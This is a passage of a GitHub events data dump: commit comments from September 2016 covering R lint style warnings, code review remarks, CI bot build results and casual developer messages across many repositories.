**Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\"); \n                                            ~~~~^\n```\n[R/Condition.R:125:50:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L125) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\"); \n                                                 ^\n```\n[R/Condition.R:125:56:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L125) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\"); \n                                                       ^\n```\n[R/Condition.R:129:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L129) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:130:9:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L130) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose);\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:130:9:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L130) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose);\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:131:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L131) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:133:23:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L133) *style:* **Variable and function names should be all lowercase.**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:133:23:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L133) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:134:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L134) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:139:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L139) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, KDA_X, KDA_Y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:140:72:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L140) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                       ^\n```\n[R/Condition.R:140:73:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L140) *style:* **Trailing whitespace is superfluous.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                        ^~\n```\n[R/Condition.R:141:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L141) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L146) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:147:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L147) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:150:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L150) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:151:5:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L151) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:155:18:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L155) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:155:19:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L155) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:156:13:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L156) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:156:14:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L156) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             ^\n```\n[R/Condition.R:156:16:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L156) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:156:17:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L156) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:158:1:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L158) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:159:9:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n        ^~~~~~~~~~~~\n```\n[R/Condition.R:159:60:](https://github.com/thijsjanzen/GUILDS/blob/be787afb92ca2f21f1696bb544ff777ef5eea46d/R/Condition.R#L159) *style:* **Trailing whitespace is superfluous.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n"}},"created_at":"2016-09-21T22:27:17Z"}
{"id":"4599338926","type":"CommitCommentEvent","actor":{"login":"lassoan"},"repo":{"name":"SlicerIGT/SlicerIGT"},"payload":{"comment":{"id":19121865,"position":20,"line":456,"path":"PivotCalibration/Logic/vtkSlicerPivotCalibrationLogic.cxx","commit_id":"80106cce77376eb13399aa08d9da6ac862e8b532","created_at":"2016-09-21T22:27:37Z","updated_at":"2016-09-21T22:27:37Z","body":"The assumption is that the sensor/marker origin is on the same side as the tool base."}},"created_at":"2016-09-21T22:27:37Z"}
{"id":"4599352041","type":"CommitCommentEvent","actor":{"login":"mattcarberry"},"repo":{"name":"mattcarberry/virtualagc"},"payload":{"comment":{"id":19121887,"position":125,"line":149,"path":"Aurora12/ASCENT_INERTIA_UPDATER.agc","commit_id":"fc9be773b8f6adf536a6822209f3a09847d857b4","created_at":"2016-09-21T22:30:51Z","updated_at":"2016-09-21T22:30:51Z","body":"@jimlawton Ahh. You're probably right. I've changed them to plus signs in my new commit. bc892eb232eda7644598e5900bb36c73568671ff"}},"created_at":"2016-09-21T22:30:51Z"}
{"id":"4599357787","type":"CommitCommentEvent","actor":{"login":"Felp86120502"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19121899,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-21T22:32:12Z","updated_at":"2016-09-21T22:32:12Z","body":"OK Antoine , pour vendredi, t'es au CDI jusqu'a quelle heure?"}},"created_at":"2016-09-21T22:32:12Z"}
{"id":"4599364754","type":"CommitCommentEvent","actor":{"login":"omgmakeme"},"repo":{"name":"Brandv/phase-0-tracks"},"payload":{"comment":{"id":19121917,"position":null,"line":null,"path":null,"commit_id":"137e75710f975541af40650251f0fffe6169a5e2","created_at":"2016-09-21T22:33:48Z","updated_at":"2016-09-21T22:33:48Z","body":":shipit: "}},"created_at":"2016-09-21T22:33:48Z"}
{"id":"4599376187","type":"CommitCommentEvent","actor":{"login":"jfirebaugh"},"repo":{"name":"mapbox/mapbox-gl-test-suite"},"payload":{"comment":{"id":19121940,"position":null,"line":null,"path":null,"commit_id":"01c2e8d1e7bb7a6b2a58ec0df4816eee21dd8646","created_at":"2016-09-21T22:36:38Z","updated_at":"2016-09-21T22:36:38Z","body":"@lucaswoj Did you want to merge this commit to `master`?"}},"created_at":"2016-09-21T22:36:38Z"}
{"id":"4599381858","type":"CommitCommentEvent","actor":{"login":"Brainzyy"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19121962,"position":null,"line":null,"path":null,"commit_id":"b420f6c6ad093f6eded617c9bfb989f6316b1bd7","created_at":"2016-09-21T22:38:01Z","updated_at":"2016-09-21T22:38:01Z","body":"You forgot to change \"livestreamer\" to \"streamlink\". "}},"created_at":"2016-09-21T22:38:01Z"}
{"id":"4599382048","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19121965,"position":null,"line":null,"path":null,"commit_id":"f5187ab487a2800e3ad7e78d357847c3de345143","created_at":"2016-09-21T22:38:04Z","updated_at":"2016-09-21T22:38:04Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1194 of 1194 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.12%25-green.svg)</a>\n"}},"created_at":"2016-09-21T22:38:04Z"}
{"id":"4599386996","type":"CommitCommentEvent","actor":{"login":"cydh"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":19121979,"position":6,"line":6,"path":"db/import-tmpl/sc_config.conf","commit_id":"dd6ef41b0907201f3701ee4a082afcaf1afbc79c","created_at":"2016-09-21T22:39:17Z","updated_at":"2016-09-21T22:39:17Z","body":"errr forgot change this when I update the sc_config.conf files, that before I copaste from last aleos' changes"}},"created_at":"2016-09-21T22:39:17Z"}
{"id":"4599392780","type":"CommitCommentEvent","actor":{"login":"FranciBanko"},"repo":{"name":"FranciBanko/Hello-World"},"payload":{"comment":{"id":19121997,"position":null,"line":null,"path":null,"commit_id":"fa50c067c3b103b2545305d42cf83299ae63d852","created_at":"2016-09-21T22:40:43Z","updated_at":"2016-09-21T22:40:43Z","body":"vaja"}},"created_at":"2016-09-21T22:40:43Z"}
{"id":"4599394473","type":"CommitCommentEvent","actor":{"login":"jedipi"},"repo":{"name":"mvantellingen/python-zeep"},"payload":{"comment":{"id":19122005,"position":null,"line":null,"path":null,"commit_id":"d44f3fc73f6f2a9b567be3ece077d018cc49cfa6","created_at":"2016-09-21T22:41:07Z","updated_at":"2016-09-21T22:41:07Z","body":"i don't think this resolves https://github.com/mvantellingen/python-zeep/issues/184. i'm getting the same issue after trying out this code.. here is my nsmap:\r\n```json\r\n{'msdata': 'urn:schemas-microsoft-com:xml-msdata', 'xsd': 'http://www.w3.org/2001/XMLSchema', None: '', 'xs': 'http://www.w3.org/2001/XMLSchema', 'xsi': 'http://www.w3.org/2001/XMLSchema-instance', 'soap': 'http://schemas.xmlsoap.org/soap/envelope/'}\r\n```\r\nI'm not sure where None is getting set to an empty string"}},"created_at":"2016-09-21T22:41:07Z"}
{"id":"4599405663","type":"CommitCommentEvent","actor":{"login":"ruimarinho"},"repo":{"name":"ruimarinho/eslint-test"},"payload":{"comment":{"id":19122034,"position":4,"line":null,"path":"index.js","commit_id":"d31380ce36c135838c868f9a5642ee1b0f7edba8","created_at":"2016-09-21T22:43:46Z","updated_at":"2016-09-21T22:43:46Z","body":"**no-constant-condition**: Unexpected constant condition."}},"created_at":"2016-09-21T22:43:46Z"}
{"id":"4599406369","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"bartobri/no-more-secrets"},"payload":{"comment":{"id":19122036,"position":null,"line":null,"path":null,"commit_id":"c2e11ddd6599dd5aa3895afea413e368bc8c84ba","created_at":"2016-09-21T22:43:56Z","updated_at":"2016-09-21T22:43:56Z","body":"Cool! The movie clip has me sold on this : D"}},"created_at":"2016-09-21T22:43:56Z"}
{"id":"4599408484","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19122043,"position":null,"line":null,"path":null,"commit_id":"89a2214f5e9b3170f741fc57fb6c3d24f1008940","created_at":"2016-09-21T22:44:28Z","updated_at":"2016-09-21T22:44:28Z","body":"develop (Unknown) - x86_64-MacOS-10.10-clang: OK (2387 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-89a2214f5e9b3170f741fc57fb6c3d24f1008940-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-89a2214f5e9b3170f741fc57fb6c3d24f1008940-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.51%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T22:44:28Z"}
{"id":"4599412739","type":"CommitCommentEvent","actor":{"login":"dalexj"},"repo":{"name":"Ameobea/Calculator-Programs"},"payload":{"comment":{"id":19122052,"position":null,"line":null,"path":null,"commit_id":"e40842b3975e9cb4b8a37561c2cac224f31cc182","created_at":"2016-09-21T22:45:26Z","updated_at":"2016-09-21T22:45:26Z","body":"please verify this commit\r\n"}},"created_at":"2016-09-21T22:45:26Z"}
{"id":"4599414589","type":"CommitCommentEvent","actor":{"login":"md5"},"repo":{"name":"SuperTux88/rubymetrics-plugin"},"payload":{"comment":{"id":19122055,"position":null,"line":null,"path":null,"commit_id":"61f5f2ad69c284e89e7d04660fb6365ddc780eb3","created_at":"2016-09-21T22:45:54Z","updated_at":"2016-09-21T22:45:54Z","body":"I ended up opening a PR including this commit. Hope you don't mind: https://github.com/jenkinsci/rubymetrics-plugin/pull/28"}},"created_at":"2016-09-21T22:45:54Z"}
{"id":"4599416203","type":"CommitCommentEvent","actor":{"login":"M4GNV5"},"repo":{"name":"M4GNV5/PointerScript"},"payload":{"comment":{"id":19122057,"position":null,"line":null,"path":null,"commit_id":"662927e98df8d57ba293d087b08f172af0195dc4","created_at":"2016-09-21T22:46:18Z","updated_at":"2016-09-21T22:46:18Z","body":"*implement"}},"created_at":"2016-09-21T22:46:18Z"}
{"id":"4599416609","type":"CommitCommentEvent","actor":{"login":"Xika1024"},"repo":{"name":"Xika1024/ComponentObject"},"payload":{"comment":{"id":19122059,"position":null,"line":null,"path":null,"commit_id":"ccacf953fb191bf34c4297643d2da9a503ef970c","created_at":"2016-09-21T22:46:24Z","updated_at":"2016-09-21T22:46:24Z","body":"完了？"}},"created_at":"2016-09-21T22:46:24Z"}
{"id":"4599418210","type":"CommitCommentEvent","actor":{"login":"tananaev"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19122066,"position":null,"line":null,"path":null,"commit_id":"2d595441ba2470fdec01564f25e4b6a11e5a76a6","created_at":"2016-09-21T22:46:49Z","updated_at":"2016-09-21T22:46:49Z","body":"What does your comment mean?"}},"created_at":"2016-09-21T22:46:49Z"}
{"id":"4599419867","type":"CommitCommentEvent","actor":{"login":"Orhideous"},"repo":{"name":"NeatSketch/tabun"},"payload":{"comment":{"id":19122069,"position":2,"line":2,"path":"fixtures/migrations/0001_add_acl_fields.sql","commit_id":"eec5763ea1a9fea84e748e4f793bad1786c56205","created_at":"2016-09-21T22:47:16Z","updated_at":"2016-09-21T22:47:16Z","body":"`SMALLINT`?"}},"created_at":"2016-09-21T22:47:16Z"}
{"id":"4599420920","type":"CommitCommentEvent","actor":{"login":"tananaev"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19122074,"position":null,"line":null,"path":null,"commit_id":"8ed94697f46788d56d71551940b2f4f4778bb9de","created_at":"2016-09-21T22:47:33Z","updated_at":"2016-09-21T22:47:33Z","body":"I don't know what you are trying to say, but you need to write text describing what you mean."}},"created_at":"2016-09-21T22:47:33Z"}
{"id":"4599423815","type":"CommitCommentEvent","actor":{"login":"tananaev"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19122083,"position":null,"line":null,"path":null,"commit_id":"80bbc136baf6a91b967732fdae4238f827b9bf19","created_at":"2016-09-21T22:48:18Z","updated_at":"2016-09-21T22:48:18Z","body":"Same here. What does this mean?"}},"created_at":"2016-09-21T22:48:18Z"}
{"id":"4599426624","type":"CommitCommentEvent","actor":{"login":"Orhideous"},"repo":{"name":"NeatSketch/tabun"},"payload":{"comment":{"id":19122094,"position":82,"line":92,"path":"classes/modules/blog/entity/BlogUser.entity.class.php","commit_id":"eec5763ea1a9fea84e748e4f793bad1786c56205","created_at":"2016-09-21T22:49:03Z","updated_at":"2016-09-21T22:49:03Z","body":"Но ведь метод возвращает инстанс `Permissions`, а не `int|null`"}},"created_at":"2016-09-21T22:49:03Z"}
{"id":"4599429854","type":"CommitCommentEvent","actor":{"login":"purpleidea"},"repo":{"name":"ffrank/mgmt"},"payload":{"comment":{"id":19122104,"position":null,"line":null,"path":null,"commit_id":"4742defc20e1159577f3b6f08e70015b8905d20d","created_at":"2016-09-21T22:49:55Z","updated_at":"2016-09-21T22:49:55Z","body":"You're missing two important parts:\r\n\r\n1) This is needed for gob to work properly.\r\n```\r\nfunc init() {\r\n\tgob.Register(&JournalRes{})\r\n}\r\n```\r\n\r\n2) An entry in config.go in the resources struct.\r\n\r\nLMK if there are any other issues. Cool idea!\r\n"}},"created_at":"2016-09-21T22:49:55Z"}
{"id":"4599430168","type":"CommitCommentEvent","actor":{"login":"jeffhuang"},"repo":{"name":"brownhci/Rewind"},"payload":{"comment":{"id":19122106,"position":null,"line":null,"path":null,"commit_id":"4581e88a6a48be166476cd19a18a30be2117bd49","created_at":"2016-09-21T22:50:00Z","updated_at":"2016-09-21T22:50:00Z","body":"Thanks, I'm going to merge in my changes in the same sections too. So hang tight :)"}},"created_at":"2016-09-21T22:50:00Z"}
{"id":"4599431600","type":"CommitCommentEvent","actor":{"login":"Orhideous"},"repo":{"name":"NeatSketch/tabun"},"payload":{"comment":{"id":19122110,"position":150,"line":445,"path":"classes/modules/acl/ACL.class.php","commit_id":"eec5763ea1a9fea84e748e4f793bad1786c56205","created_at":"2016-09-21T22:50:21Z","updated_at":"2016-09-21T22:50:21Z","body":"Можно упростить до `return $oBlogUser->getBlogPermissions()->check(Permissions::UPDATE)`"}},"created_at":"2016-09-21T22:50:21Z"}
{"id":"4599434798","type":"CommitCommentEvent","actor":{"login":"Orhideous"},"repo":{"name":"NeatSketch/tabun"},"payload":{"comment":{"id":19122121,"position":null,"line":null,"path":null,"commit_id":"eec5763ea1a9fea84e748e4f793bad1786c56205","created_at":"2016-09-21T22:51:08Z","updated_at":"2016-09-21T22:51:08Z","body":"Можно делать ветку в основном репозитории и допиливать там."}},"created_at":"2016-09-21T22:51:08Z"}
{"id":"4599435047","type":"CommitCommentEvent","actor":{"login":"asterite"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19122122,"position":5,"line":213,"path":"src/string.cr","commit_id":"d657b9a53830b6e3c3771cf8afeb4e68172c147e","created_at":"2016-09-21T22:51:12Z","updated_at":"2016-09-21T22:51:12Z","body":"A 251 was passed, but this was a UInt8. So `251 + HEADER_SIZE + 1`, is `251 + 12 + 1` = `264`, but that doesn't fit in a UInt8, or yes, but it's implicitly an `8`. So less memory then needed was allocated for the string, and it was written past it (to an unknown memory location)"}},"created_at":"2016-09-21T22:51:12Z"}
{"id":"4599436202","type":"CommitCommentEvent","actor":{"login":"frankieyan"},"repo":{"name":"clio/lib-themisui"},"payload":{"comment":{"id":19122124,"position":14,"line":32,"path":"themis_components/thTableActionBarBETA/thActionBarDelegate.service.coffee","commit_id":"f7b564073ccc9f7deeca19d62efa8daa1a818602","created_at":"2016-09-21T22:51:28Z","updated_at":"2016-09-21T22:51:28Z","body":"👍 "}},"created_at":"2016-09-21T22:51:28Z"}
{"id":"4599436266","type":"CommitCommentEvent","actor":{"login":"barrars"},"repo":{"name":"lukesampson/scoop"},"payload":{"comment":{"id":19122125,"position":3,"line":7,"path":"bucket/imagemagick.json","commit_id":"b6bdadb37f86144330e58e46a1552dc3b050ceb9","created_at":"2016-09-21T22:51:29Z","updated_at":"2016-09-21T22:51:29Z","body":"Please update to ImageMagick-7.0.3-1\r\n\r\n \"url\": \"http://www.imagemagick.org/download/binaries/ImageMagick-7.0.3-1-portable-Q16-x64.zip\""}},"created_at":"2016-09-21T22:51:29Z"}
{"id":"4599445283","type":"CommitCommentEvent","actor":{"login":"iiKoe"},"repo":{"name":"iiKoe/bustamove"},"payload":{"comment":{"id":19122151,"position":null,"line":null,"path":null,"commit_id":"e4ebfb66f2617273432b2703875e4ff54025148c","created_at":"2016-09-21T22:53:42Z","updated_at":"2016-09-21T22:53:42Z","body":"NB. This was an error due to a miss click in the GitHub gui, a hard git reset was deemed inappropriate as this is a public repo and its scary."}},"created_at":"2016-09-21T22:53:42Z"}
{"id":"4599447322","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19122154,"position":null,"line":null,"path":null,"commit_id":"c68b4297923893da10611ee856944ed40ffe3373","created_at":"2016-09-21T22:54:08Z","updated_at":"2016-09-21T22:54:08Z","body":"develop (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1784 of 1784 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T22:54:08Z"}
{"id":"4599453075","type":"CommitCommentEvent","actor":{"login":"mklemarczyk"},"repo":{"name":"Codeception/Codeception"},"payload":{"comment":{"id":19122167,"position":null,"line":null,"path":null,"commit_id":"c05ac65c7ab67f5fa1be472e0b69fbd118867e49","created_at":"2016-09-21T22:55:31Z","updated_at":"2016-09-21T22:55:31Z","body":"It still does not resolve problem in 2.1.x Codeception. Can you release a path?\r\n"}},"created_at":"2016-09-21T22:55:31Z"}
{"id":"4599453679","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19122169,"position":101,"line":72,"path":"css/1_header.scss","commit_id":"07c7b39e6eb256c464ed2595c12ba4c840830b27","created_at":"2016-09-21T22:55:40Z","updated_at":"2016-09-21T22:55:40Z","body":"right. -done"}},"created_at":"2016-09-21T22:55:40Z"}
{"id":"4599457303","type":"CommitCommentEvent","actor":{"login":"jeffhuang"},"repo":{"name":"brownhci/Rewind"},"payload":{"comment":{"id":19122178,"position":null,"line":null,"path":null,"commit_id":"4581e88a6a48be166476cd19a18a30be2117bd49","created_at":"2016-09-21T22:56:36Z","updated_at":"2016-09-21T22:56:36Z","body":"Pushed the merge. Hope I didn't clobber another thing you wrote."}},"created_at":"2016-09-21T22:56:36Z"}
{"id":"4599458820","type":"CommitCommentEvent","actor":{"login":"DHowett-MSFT"},"repo":{"name":"Microsoft/WinObjC"},"payload":{"comment":{"id":19122182,"position":5,"line":30,"path":"tests/testapps/CTCatalog/CTCatalog/Tests/CTCFrameTestViewController.mm","commit_id":"59c05d9083d4f53f098c7feb27ba173190b52220","created_at":"2016-09-21T22:57:00Z","updated_at":"2016-09-21T22:57:00Z","body":"This will superexplode for `x.lineRef = x.lineRef`"}},"created_at":"2016-09-21T22:57:00Z"}
{"id":"4599459234","type":"CommitCommentEvent","actor":{"login":"DHowett-MSFT"},"repo":{"name":"Microsoft/WinObjC"},"payload":{"comment":{"id":19122185,"position":10,"line":35,"path":"tests/testapps/CTCatalog/CTCatalog/Tests/CTCFrameTestViewController.mm","commit_id":"59c05d9083d4f53f098c7feb27ba173190b52220","created_at":"2016-09-21T22:57:06Z","updated_at":"2016-09-21T22:57:06Z","body":"Whose job is it to release this?"}},"created_at":"2016-09-21T22:57:06Z"}
{"id":"4599460070","type":"CommitCommentEvent","actor":{"login":"cdrage"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19122191,"position":null,"line":null,"path":null,"commit_id":"b420f6c6ad093f6eded617c9bfb989f6316b1bd7","created_at":"2016-09-21T22:57:19Z","updated_at":"2016-09-21T22:57:19Z","body":"@scottbernstein yeah... please open a PR! Do NOT push to master. I'm going to revert / remove this commit."}},"created_at":"2016-09-21T22:57:19Z"}
{"id":"4599461555","type":"CommitCommentEvent","actor":{"login":"darkforcesjedi"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":19122195,"position":null,"line":null,"path":null,"commit_id":"469428409fd2cee57205b8d37b8657a7115a6035","created_at":"2016-09-21T22:57:43Z","updated_at":"2016-09-21T22:57:43Z","body":"I should change the map link to maps.apple.com. I am told that maps.apple.com links will open in Apple maps on iDevices and will redirect to maps.google.com on Android devices (which will launch the app on Android when opened in the native browser or chrome).\r\n\r\nI don't have an iDevice to test this on though."}},"created_at":"2016-09-21T22:57:43Z"}
{"id":"4599464042","type":"CommitCommentEvent","actor":{"login":"spikebrehm"},"repo":{"name":"airbnb/react-native-maps"},"payload":{"comment":{"id":19122208,"position":4,"line":4,"path":"components/ProviderPropType.js","commit_id":"2d37a79a43f3239086b0dab8678305be2b21fc1e","created_at":"2016-09-21T22:58:23Z","updated_at":"2016-09-21T22:58:23Z","body":"unfinished?"}},"created_at":"2016-09-21T22:58:23Z"}
{"id":"4599468570","type":"CommitCommentEvent","actor":{"login":"frankieyan"},"repo":{"name":"clio/lib-themisui"},"payload":{"comment":{"id":19122223,"position":22,"line":33,"path":"themis_components/thTableActionBarBETA/thSelectableCollection.service.coffee","commit_id":"f7b564073ccc9f7deeca19d62efa8daa1a818602","created_at":"2016-09-21T22:59:38Z","updated_at":"2016-09-21T22:59:38Z","body":"Parenthesis"}},"created_at":"2016-09-21T22:59:38Z"}
{"id":"4599469169","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19122225,"position":null,"line":null,"path":null,"commit_id":"c68b4297923893da10611ee856944ed40ffe3373","created_at":"2016-09-21T22:59:48Z","updated_at":"2016-09-21T22:59:48Z","body":"develop (nmerket) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c68b4297923893da10611ee856944ed40ffe3373-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T22:59:48Z"}
{"id":"4599472074","type":"CommitCommentEvent","actor":{"login":"SuperTux88"},"repo":{"name":"SuperTux88/rubymetrics-plugin"},"payload":{"comment":{"id":19122229,"position":null,"line":null,"path":null,"commit_id":"61f5f2ad69c284e89e7d04660fb6365ddc780eb3","created_at":"2016-09-21T23:00:31Z","updated_at":"2016-09-21T23:00:31Z","body":"Yeah, thanks for continuing my work 👍 "}},"created_at":"2016-09-21T23:00:31Z"}
